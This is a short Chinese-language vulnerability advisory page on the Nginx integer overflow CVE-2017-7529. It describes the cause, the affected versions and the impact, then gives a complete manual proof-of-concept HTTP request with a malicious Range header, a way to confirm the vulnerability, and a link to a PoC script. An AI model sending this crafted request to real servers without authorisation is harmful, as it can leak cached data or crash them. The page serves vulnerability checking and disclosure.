Nginx 整数溢出漏洞 CVE-2017-7529

漏洞信息·网络安全 · 2023-09-23 · 675 人浏览

原理

Nginx范围过滤器模块中存在整数溢出漏洞,允许远程攻击者利用漏洞提交特殊的请求,获取敏感信息或使应用程序崩溃。

影响范围

Nginx < 1.13.2

危害

获取缓存的HTTP请求或使应用程序崩溃。

POC & EXP

手工

GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Connection: close
Range: bytes=-17208,-9223372036854758792

状态码为206则说明存在漏洞。

脚本

https://github.com/en0f/CVE-2017-7529_PoC

2017年 溢出 675 Views
本站已在互联网运行了 Theme Jasmine by Kent Liao